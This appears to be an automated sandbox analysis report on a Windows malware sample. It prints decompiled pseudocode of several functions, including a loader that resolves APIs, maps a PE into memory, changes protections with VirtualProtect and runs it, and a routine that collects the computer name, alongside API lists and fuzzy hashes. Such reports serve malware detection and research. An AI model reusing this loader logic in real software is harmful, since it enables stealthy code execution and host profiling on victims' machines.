                                                                                                                                  • StrTrimA.KERNELBASE(?,00A3C2A4,00000002,?,00A3935C,?,033A95AC,?,00A35390), ref: 00A3517B
                                                                                                                                  • StrChrA.SHLWAPI(?,00000020,?,00A3935C,?,033A95AC,?,00A35390), ref: 00A35186
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Trim
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3043112668-0
                                                                                                                                  • Opcode ID: 50bf4c0378aab2dc343c3a307a2f17508088ef5aa3ab5490a92c84dc1d5a0ece
                                                                                                                                  • Instruction ID: f11a86ffbf5d8bbb0b43c0222624bce902705e715013aa9b60fbabb963ed4331
                                                                                                                                  • Opcode Fuzzy Hash: 50bf4c0378aab2dc343c3a307a2f17508088ef5aa3ab5490a92c84dc1d5a0ece
                                                                                                                                  • Instruction Fuzzy Hash: DB01BC71B04746AFE724AB7E8C44F67BB9DEB86740F140112BA45CB282DA70C80287A0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 32%
                                                                                                                                  			E00A31F72(intOrPtr _a4, signed int _a8) {
                                                                                                                                  				long _v8;
                                                                                                                                  				long _v12;
                                                                                                                                  				char _v16;
                                                                                                                                  				void* _t14;
                                                                                                                                  				long _t15;
                                                                                                                                  				char* _t17;
                                                                                                                                  				intOrPtr* _t19;
                                                                                                                                  				signed int _t22;
                                                                                                                                  
                                                                                                                                  				_t19 = __imp__; // 0x6fa7e700
                                                                                                                                  				_t22 =  ~_a8;
                                                                                                                                  				_v12 = 0;
                                                                                                                                  				asm("sbb esi, esi");
                                                                                                                                  				while(1) {
                                                                                                                                  					_v8 = 0;
                                                                                                                                  					_t14 =  *_t19(_a4, _a8, _t22, 0, 0, 0, 0); // executed
                                                                                                                                  					if(_t14 != 0) {
                                                                                                                                  						break;
                                                                                                                                  					}
                                                                                                                                  					_t15 = GetLastError();
                                                                                                                                  					_v8 = _t15;
                                                                                                                                  					if(_t15 != 0x2f8f) {
                                                                                                                                  						if(_t15 == 0x2f00) {
                                                                                                                                  							continue;
                                                                                                                                  						}
                                                                                                                                  					} else {
                                                                                                                                  						_v16 = 0x3300;
                                                                                                                                  						if(_v12 == 0) {
                                                                                                                                  							_t17 =  &_v16;
                                                                                                                                  							__imp__(_a4, 0x1f, _t17, 4);
                                                                                                                                  							if(_t17 == 0) {
                                                                                                                                  								_v8 = GetLastError();
                                                                                                                                  							} else {
                                                                                                                                  								_v12 = 1;
                                                                                                                                  								continue;
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					L9:
                                                                                                                                  					return _v8;
                                                                                                                                  				}
                                                                                                                                  				goto L9;
                                                                                                                                  			}












                                                                                                                                  APIs
                                                                                                                                  • GetLastError.KERNEL32 ref: 00A31F8F
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,00A346B9,00000000,?,?), ref: 00A31FE6
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ErrorLast
                                                                                                                                  • String ID: @MtNt
                                                                                                                                  • API String ID: 1452528299-3251738875
                                                                                                                                  • Opcode ID: 13e3a690d8ef70e8ef93f466c01b18b0d2e3e5650bc85acf07ea81043de53138
                                                                                                                                  • Instruction ID: 9dbc4c02b3f1abf3a97dd96f025566982b5940789598695b25ae76f3d59d9674
                                                                                                                                  • Opcode Fuzzy Hash: 13e3a690d8ef70e8ef93f466c01b18b0d2e3e5650bc85acf07ea81043de53138
                                                                                                                                  • Instruction Fuzzy Hash: C4014C31904208FBDB10DFEADC48EAEBFB8EB85760F108067F901E2254D7708A45DB60
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A34AAB(void* _a4) {
                                                                                                                                  				char _t2;
                                                                                                                                  
                                                                                                                                  				_t2 = RtlFreeHeap( *0xa3d270, 0, _a4); // executed
                                                                                                                                  				return _t2;
                                                                                                                                  			}





                                                                                                                                  APIs
                                                                                                                                  • RtlFreeHeap.NTDLL(00000000,00000000,00A35012,00000000,?,?,00000000), ref: 00A34AB7
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeHeap
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3298025750-8415677
                                                                                                                                  • Opcode ID: ac5ab1952c78a6228b75ee719aee2907923688bf954047713ea0bb57f302e48c
                                                                                                                                  • Instruction ID: 7832c9eec240268f1c83484c1f14c76d58234a07a3695f5b54a307a47e086f03
                                                                                                                                  • Opcode Fuzzy Hash: ac5ab1952c78a6228b75ee719aee2907923688bf954047713ea0bb57f302e48c
                                                                                                                                  • Instruction Fuzzy Hash: D1B012F5100100EBCE21CBD0EF04F06BA31B750700F004011B30410070C2318432FB15
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 75%
                                                                                                                                  			E00A3144D(void* __ecx, void* _a4, intOrPtr _a8, char _a12, intOrPtr _a16, char _a20, intOrPtr _a24, intOrPtr* _a28) {
                                                                                                                                  				void* _v8;
                                                                                                                                  				void* __esi;
                                                                                                                                  				intOrPtr* _t35;
                                                                                                                                  				void* _t40;
                                                                                                                                  				intOrPtr* _t41;
                                                                                                                                  				intOrPtr* _t43;
                                                                                                                                  				intOrPtr* _t45;
                                                                                                                                  				intOrPtr* _t50;
                                                                                                                                  				intOrPtr* _t52;
                                                                                                                                  				void* _t54;
                                                                                                                                  				intOrPtr* _t55;
                                                                                                                                  				intOrPtr* _t57;
                                                                                                                                  				intOrPtr* _t61;
                                                                                                                                  				intOrPtr* _t65;
                                                                                                                                  				intOrPtr _t68;
                                                                                                                                  				void* _t72;
                                                                                                                                  				void* _t75;
                                                                                                                                  				void* _t76;
                                                                                                                                  
                                                                                                                                  				_t55 = _a4;
                                                                                                                                  				_t35 =  *((intOrPtr*)(_t55 + 4));
                                                                                                                                  				_a4 = 0;
                                                                                                                                  				_t76 =  *((intOrPtr*)( *_t35 + 0x4c))(_t35, _a16, 0,  &_v8, 0, _t72, _t75, _t54, __ecx, __ecx);
                                                                                                                                  				if(_t76 < 0) {
                                                                                                                                  					L18:
                                                                                                                                  					return _t76;
                                                                                                                                  				}
                                                                                                                                  				_t40 = E00A33DA0(_v8, _a8, _a12, _a20,  &_a20,  &_a12); // executed
                                                                                                                                  				_t76 = _t40;
                                                                                                                                  				if(_t76 >= 0) {
                                                                                                                                  					_t61 = _a28;
                                                                                                                                  					if(_t61 != 0 &&  *_t61 != 0) {
                                                                                                                                  						_t52 = _v8;
                                                                                                                                  						_t76 =  *((intOrPtr*)( *_t52 + 0x14))(_t52, _a24, 0, _t61, 0);
                                                                                                                                  					}
                                                                                                                                  					if(_t76 >= 0) {
                                                                                                                                  						_t43 =  *_t55;
                                                                                                                                  						_t68 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  						_t20 = _t68 + 0xa3e1fc; // 0x740053
                                                                                                                                  						_t76 =  *((intOrPtr*)( *_t43 + 0x60))(_t43, _t20, _a16, 0, 0, _v8,  &_a4, 0);
                                                                                                                                  						if(_t76 >= 0) {
                                                                                                                                  							_t76 = E00A347EB(_a4);
                                                                                                                                  							if(_t76 >= 0) {
                                                                                                                                  								_t65 = _a28;
                                                                                                                                  								if(_t65 != 0 &&  *_t65 == 0) {
                                                                                                                                  									_t50 = _a4;
                                                                                                                                  									_t76 =  *((intOrPtr*)( *_t50 + 0x10))(_t50, _a24, 0, _t65, 0, 0);
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  						_t45 = _a4;
                                                                                                                                  						if(_t45 != 0) {
                                                                                                                                  							 *((intOrPtr*)( *_t45 + 8))(_t45);
                                                                                                                                  						}
                                                                                                                                  						_t57 = __imp__#6;
                                                                                                                                  						if(_a20 != 0) {
                                                                                                                                  							 *_t57(_a20);
                                                                                                                                  						}
                                                                                                                                  						if(_a12 != 0) {
                                                                                                                                  							 *_t57(_a12);
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				_t41 = _v8;
                                                                                                                                  				 *((intOrPtr*)( *_t41 + 8))(_t41);
                                                                                                                                  				goto L18;
                                                                                                                                  			}






















                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00A33DA0: SysAllocString.OLEAUT32(80000002), ref: 00A33DFD
                                                                                                                                    • Part of subcall function 00A33DA0: SysFreeString.OLEAUT32(00000000), ref: 00A33E63
                                                                                                                                  • SysFreeString.OLEAUT32(?), ref: 00A3152C
                                                                                                                                  • SysFreeString.OLEAUT32(00A328D9), ref: 00A31536
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: String$Free$Alloc
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 986138563-0
                                                                                                                                  • Opcode ID: 6c984a347045985d6a21ffbb64b012b81988235f7f0db44ee3c37fd0a301e332
                                                                                                                                  • Instruction ID: 3a7e55bcde3cba80c6081097c2046c2f71f6239a8eeae4d6d81540a8c1ea33db
                                                                                                                                  • Opcode Fuzzy Hash: 6c984a347045985d6a21ffbb64b012b81988235f7f0db44ee3c37fd0a301e332
                                                                                                                                  • Instruction Fuzzy Hash: 39310776500119EFCB25DFA9CD88C9BBB79FBC9750B148698F8069B210E631ED51CBA0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 86%
                                                                                                                                  			E6E8D1015(void* __eax) {
                                                                                                                                  				char _v8;
                                                                                                                                  				void* _v12;
                                                                                                                                  				void* __edi;
                                                                                                                                  				void* _t18;
                                                                                                                                  				long _t24;
                                                                                                                                  				long _t26;
                                                                                                                                  				long _t29;
                                                                                                                                  				intOrPtr _t40;
                                                                                                                                  				void* _t41;
                                                                                                                                  				intOrPtr* _t42;
                                                                                                                                  				void* _t44;
                                                                                                                                  
                                                                                                                                  				_t41 = __eax;
                                                                                                                                  				_t16 =  *0x6e8d41c0;
                                                                                                                                  				_t33 =  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e8d41c0 - 0x69b24f45 &  !( *0x6e8d41c0 - 0x69b24f45);
                                                                                                                                  				_t18 = E6E8D19C2( *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e8d41c0 - 0x69b24f45 &  !( *0x6e8d41c0 - 0x69b24f45),  *((intOrPtr*)( *((intOrPtr*)(__eax + 0x3c)) + __eax + 0x50)) +  *0x6e8d41c0 - 0x69b24f45 &  !( *0x6e8d41c0 - 0x69b24f45), _t16 + 0x964da0fc,  &_v8,  &_v12); // executed
                                                                                                                                  				if(_t18 != 0) {
                                                                                                                                  					_t29 = 8;
                                                                                                                                  					goto L8;
                                                                                                                                  				} else {
                                                                                                                                  					_t40 = _v8;
                                                                                                                                  					_t29 = E6E8D1798(_t33, _t40, _t41);
                                                                                                                                  					if(_t29 == 0) {
                                                                                                                                  						_t44 =  *((intOrPtr*)(_t40 + 0x3c)) + _t40;
                                                                                                                                  						_t24 = E6E8D1DE5(_t40, _t44); // executed
                                                                                                                                  						_t29 = _t24;
                                                                                                                                  						if(_t29 == 0) {
                                                                                                                                  							_t26 = E6E8D12B5(_t44, _t40); // executed
                                                                                                                                  							_t29 = _t26;
                                                                                                                                  							if(_t29 == 0) {
                                                                                                                                  								_push(_t26);
                                                                                                                                  								_push(1);
                                                                                                                                  								_push(_t40);
                                                                                                                                  								if( *((intOrPtr*)( *((intOrPtr*)(_t44 + 0x28)) + _t40))() == 0) {
                                                                                                                                  									_t29 = GetLastError();
                                                                                                                                  								}
                                                                                                                                  							}
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					_t42 = _v12;
                                                                                                                                  					 *((intOrPtr*)(_t42 + 0x18))( *((intOrPtr*)(_t42 + 0x1c))( *_t42));
                                                                                                                                  					E6E8D1397(_t42);
                                                                                                                                  					L8:
                                                                                                                                  					return _t29;
                                                                                                                                  				}
                                                                                                                                  			}















                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 6E8D19C2: GetModuleHandleA.KERNEL32(?,00000020,?,?,?,?,?,6E8D1051,?,?,?,?), ref: 6E8D19E6
                                                                                                                                    • Part of subcall function 6E8D19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6E8D1A08
                                                                                                                                    • Part of subcall function 6E8D19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6E8D1A1E
                                                                                                                                    • Part of subcall function 6E8D19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6E8D1A34
                                                                                                                                    • Part of subcall function 6E8D19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6E8D1A4A
                                                                                                                                    • Part of subcall function 6E8D19C2: GetProcAddress.KERNEL32(00000000,?), ref: 6E8D1A60
                                                                                                                                    • Part of subcall function 6E8D1798: memcpy.NTDLL(?,?,?,?,?,?,?,?,6E8D105F,?,?,?,?,?,?), ref: 6E8D17CF
                                                                                                                                    • Part of subcall function 6E8D1798: memcpy.NTDLL(?,?,?), ref: 6E8D1804
                                                                                                                                    • Part of subcall function 6E8D1DE5: LoadLibraryA.KERNELBASE(?,?,00000000,?,?), ref: 6E8D1E1D
                                                                                                                                    • Part of subcall function 6E8D12B5: VirtualProtect.KERNELBASE(00000000,?,?,?,?,?,00000000,?), ref: 6E8D12EE
                                                                                                                                    • Part of subcall function 6E8D12B5: VirtualProtect.KERNELBASE(00000000,?,?,?), ref: 6E8D1363
                                                                                                                                    • Part of subcall function 6E8D12B5: GetLastError.KERNEL32 ref: 6E8D1369
                                                                                                                                  • GetLastError.KERNEL32(?,?,?,?,?), ref: 6E8D1093
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: AddressProc$ErrorLastProtectVirtualmemcpy$HandleLibraryLoadModule
                                                                                                                                  • String ID: @Mt MtTt
                                                                                                                                  • API String ID: 2673762927-608512568
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E6E8D10B9() {
                                                                                                                                  				char _v16;
                                                                                                                                  				intOrPtr _v28;
                                                                                                                                  				void _v32;
                                                                                                                                  				void* _v36;
                                                                                                                                  				intOrPtr _t15;
                                                                                                                                  				void* _t16;
                                                                                                                                  				long _t25;
                                                                                                                                  				int _t26;
                                                                                                                                  				void* _t30;
                                                                                                                                  				intOrPtr* _t32;
                                                                                                                                  				signed int _t36;
                                                                                                                                  				intOrPtr _t39;
                                                                                                                                  
                                                                                                                                  				_t15 =  *0x6e8d41c4;
                                                                                                                                  				if( *0x6e8d41ac > 5) {
                                                                                                                                  					_t16 = _t15 + 0x6e8d50f9;
                                                                                                                                  				} else {
                                                                                                                                  					_t16 = _t15 + 0x6e8d50b1;
                                                                                                                                  				}
                                                                                                                                  				E6E8D15A0(_t16, _t16);
                                                                                                                                  				_t36 = 6;
                                                                                                                                  				memset( &_v32, 0, _t36 << 2);
                                                                                                                                  				if(E6E8D1EF0( &_v32,  &_v16,  *0x6e8d41c0 ^ 0xf7a71548) == 0) {
                                                                                                                                  					_t25 = 0xb;
                                                                                                                                  				} else {
                                                                                                                                  					_t26 = lstrlenW( *0x6e8d41b8);
                                                                                                                                  					_t8 = _t26 + 2; // 0x2
                                                                                                                                  					_t11 = _t26 + _t8 + 8; // 0xa
                                                                                                                                  					_t30 = E6E8D1172(_t39, _t11,  &_v32,  &_v36); // executed
                                                                                                                                  					if(_t30 == 0) {
                                                                                                                                  						_t32 = _v36;
                                                                                                                                  						 *_t32 = 0;
                                                                                                                                  						if( *0x6e8d41b8 == 0) {
                                                                                                                                  							 *((short*)(_t32 + 4)) = 0;
                                                                                                                                  						} else {
                                                                                                                                  							E6E8D2070(_t44, _t32 + 4);
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					_t25 = E6E8D1015(_v28); // executed
                                                                                                                                  				}
                                                                                                                                  				ExitThread(_t25);
                                                                                                                                  			}
















                                                                                                                                  APIs
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.682224691.000000006E8D1000.00000020.00020000.sdmp, Offset: 6E8D0000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.682210972.000000006E8D0000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682249539.000000006E8D3000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682273423.000000006E8D5000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.682314087.000000006E8D6000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ExitThreadlstrlen
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 2636182767-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			E00A34B28(intOrPtr* __edi, void* _a4, intOrPtr _a8, unsigned int _a12) {
                                                                                                                                  				void* _t21;
                                                                                                                                  				void* _t22;
                                                                                                                                  				signed int _t24;
                                                                                                                                  				intOrPtr* _t26;
                                                                                                                                  				void* _t27;
                                                                                                                                  
                                                                                                                                  				_t26 = __edi;
                                                                                                                                  				if(_a4 == 0) {
                                                                                                                                  					L2:
                                                                                                                                  					_t27 = E00A363F5(_a4, 0x80000002, _a8, _a12,  &_a4,  &_a12);
                                                                                                                                  					if(_t27 == 0) {
                                                                                                                                  						_t24 = _a12 >> 1;
                                                                                                                                  						if(_t24 == 0) {
                                                                                                                                  							_t27 = 2;
                                                                                                                                  							HeapFree( *0xa3d270, 0, _a4);
                                                                                                                                  						} else {
                                                                                                                                  							_t21 = _a4;
                                                                                                                                  							 *((short*)(_t21 + _t24 * 2 - 2)) = 0;
                                                                                                                                  							 *_t26 = _t21;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  					L6:
                                                                                                                                  					return _t27;
                                                                                                                                  				}
                                                                                                                                  				_t22 = E00A31E47(_a4, _a8, _a12, __edi); // executed
                                                                                                                                  				_t27 = _t22;
                                                                                                                                  				if(_t27 == 0) {
                                                                                                                                  					goto L6;
                                                                                                                                  				}
                                                                                                                                  				goto L2;
                                                                                                                                  			}









                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00A31E47: SysFreeString.OLEAUT32(00000000), ref: 00A31EAA
                                                                                                                                  • HeapFree.KERNEL32(00000000,00000000,00000000,80000002,74E5F710,?,00000000,?,00000000,?,00A3506B,?,004F0053,033A9370,00000000,?), ref: 00A34B8B
                                                                                                                                  Strings
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Free$HeapString
                                                                                                                                  • String ID: Ut
                                                                                                                                  • API String ID: 3806048269-8415677
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 37%
                                                                                                                                  			E00A31BBF(void* __ecx) {
                                                                                                                                  				signed int _v8;
                                                                                                                                  				void* _t15;
                                                                                                                                  				void* _t19;
                                                                                                                                  				void* _t20;
                                                                                                                                  				void* _t22;
                                                                                                                                  				intOrPtr* _t23;
                                                                                                                                  
                                                                                                                                  				_t23 = __imp__;
                                                                                                                                  				_t20 = 0;
                                                                                                                                  				_v8 = _v8 & 0;
                                                                                                                                  				 *_t23(3, 0,  &_v8, _t19, _t22, __ecx); // executed
                                                                                                                                  				_t10 = _v8;
                                                                                                                                  				if(_v8 != 0) {
                                                                                                                                  					_t20 = E00A375F6(_t10 + 1);
                                                                                                                                  					if(_t20 != 0) {
                                                                                                                                  						_t15 =  *_t23(3, _t20,  &_v8); // executed
                                                                                                                                  						if(_t15 != 0) {
                                                                                                                                  							 *((char*)(_v8 + _t20)) = 0;
                                                                                                                                  						} else {
                                                                                                                                  							E00A34AAB(_t20);
                                                                                                                                  							_t20 = 0;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t20;
                                                                                                                                  			}










                                                                                                                                  APIs
                                                                                                                                  • GetComputerNameExA.KERNELBASE(00000003,00000000,00A34531,74E5F710,00000000,?,?,00A34531), ref: 00A31BD7
                                                                                                                                    • Part of subcall function 00A375F6: RtlAllocateHeap.NTDLL(00000000,00000000,00A34F70), ref: 00A37602
                                                                                                                                  • GetComputerNameExA.KERNELBASE(00000003,00000000,00A34531,00A34532,?,?,00A34531), ref: 00A31BF4
                                                                                                                                    • Part of subcall function 00A34AAB: RtlFreeHeap.NTDLL(00000000,00000000,00A35012,00000000,?,?,00000000), ref: 00A34AB7
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: ComputerHeapName$AllocateFree
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 187446995-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 100%
                                                                                                                                  			_entry_(intOrPtr _a4, intOrPtr _a8) {
                                                                                                                                  				intOrPtr _t4;
                                                                                                                                  				void* _t10;
                                                                                                                                  				void* _t11;
                                                                                                                                  				void* _t12;
                                                                                                                                  				void* _t14;
                                                                                                                                  
                                                                                                                                  				_t14 = 1;
                                                                                                                                  				_t4 = _a8;
                                                                                                                                  				if(_t4 == 0) {
                                                                                                                                  					if(InterlockedDecrement(0xa3d274) == 0) {
                                                                                                                                  						E00A34450();
                                                                                                                                  					}
                                                                                                                                  				} else {
                                                                                                                                  					if(_t4 == 1 && InterlockedIncrement(0xa3d274) == 1) {
                                                                                                                                  						_t10 = E00A3262F(_t11, _t12, _a4); // executed
                                                                                                                                  						if(_t10 != 0) {
                                                                                                                                  							_t14 = 0;
                                                                                                                                  						}
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t14;
                                                                                                                                  			}









                                                                                                                                  APIs
                                                                                                                                  • InterlockedIncrement.KERNEL32(00A3D274), ref: 00A318ED
                                                                                                                                    • Part of subcall function 00A3262F: HeapCreate.KERNELBASE(00000000,00400000,00000000,?,00000001,?,?,?,00A31900,?), ref: 00A32642
                                                                                                                                  • InterlockedDecrement.KERNEL32(00A3D274), ref: 00A3190D
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: Interlocked$CreateDecrementHeapIncrement
                                                                                                                                  • String ID:
                                                                                                                                  • API String ID: 3834848776-0
                                                                                                                                  Uniqueness

                                                                                                                                  Uniqueness Score: -1.00%

                                                                                                                                  C-Code - Quality: 34%
                                                                                                                                  			E00A31E47(intOrPtr _a4, intOrPtr _a8, intOrPtr _a12, intOrPtr* _a16) {
                                                                                                                                  				intOrPtr _v12;
                                                                                                                                  				void* _v18;
                                                                                                                                  				char _v20;
                                                                                                                                  				intOrPtr _t15;
                                                                                                                                  				void* _t17;
                                                                                                                                  				intOrPtr _t19;
                                                                                                                                  				void* _t23;
                                                                                                                                  
                                                                                                                                  				_v20 = 0;
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosd");
                                                                                                                                  				asm("stosw");
                                                                                                                                  				_t15 =  *0xa3d2e0; // 0x296a5a8
                                                                                                                                  				_t4 = _t15 + 0xa3e39c; // 0x33a8944
                                                                                                                                  				_t20 = _t4;
                                                                                                                                  				_t6 = _t15 + 0xa3e124; // 0x650047
                                                                                                                                  				_t17 = E00A3144D(_t4, _a4, 0x80000002, _a8, _t6, _a12, _t4,  &_v20); // executed
                                                                                                                                  				if(_t17 < 0) {
                                                                                                                                  					_t23 = _t17;
                                                                                                                                  				} else {
                                                                                                                                  					_t23 = 8;
                                                                                                                                  					if(_v20 != _t23) {
                                                                                                                                  						_t23 = 1;
                                                                                                                                  					} else {
                                                                                                                                  						_t19 = E00A325D6(_t20, _v12);
                                                                                                                                  						if(_t19 != 0) {
                                                                                                                                  							 *_a16 = _t19;
                                                                                                                                  							_t23 = 0;
                                                                                                                                  						}
                                                                                                                                  						__imp__#6(_v12);
                                                                                                                                  					}
                                                                                                                                  				}
                                                                                                                                  				return _t23;
                                                                                                                                  			}











                                                                                                                                  APIs
                                                                                                                                    • Part of subcall function 00A3144D: SysFreeString.OLEAUT32(?), ref: 00A3152C
                                                                                                                                    • Part of subcall function 00A325D6: lstrlenW.KERNEL32(004F0053,00000000,00000000,?,?,00A3474F,004F0053,00000000,?), ref: 00A325DF
                                                                                                                                    • Part of subcall function 00A325D6: memcpy.NTDLL(00000000,004F0053,?,?,00000002,?,?,00A3474F,004F0053,00000000,?), ref: 00A32609
                                                                                                                                    • Part of subcall function 00A325D6: memset.NTDLL ref: 00A3261D
                                                                                                                                  • SysFreeString.OLEAUT32(00000000), ref: 00A31EAA
                                                                                                                                  Memory Dump Source
                                                                                                                                  • Source File: 00000002.00000002.677239189.0000000000A31000.00000020.00020000.sdmp, Offset: 00A30000, based on PE: true
                                                                                                                                  • Associated: 00000002.00000002.677195440.0000000000A30000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677288144.0000000000A3C000.00000002.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677322676.0000000000A3D000.00000004.00020000.sdmp
                                                                                                                                  • Associated: 00000002.00000002.677335408.0000000000A3F000.00000002.00020000.sdmp
                                                                                                                                  Similarity
                                                                                                                                  • API ID: FreeString$lstrlenmemcpymemset
                                                                                                                                  • String ID:
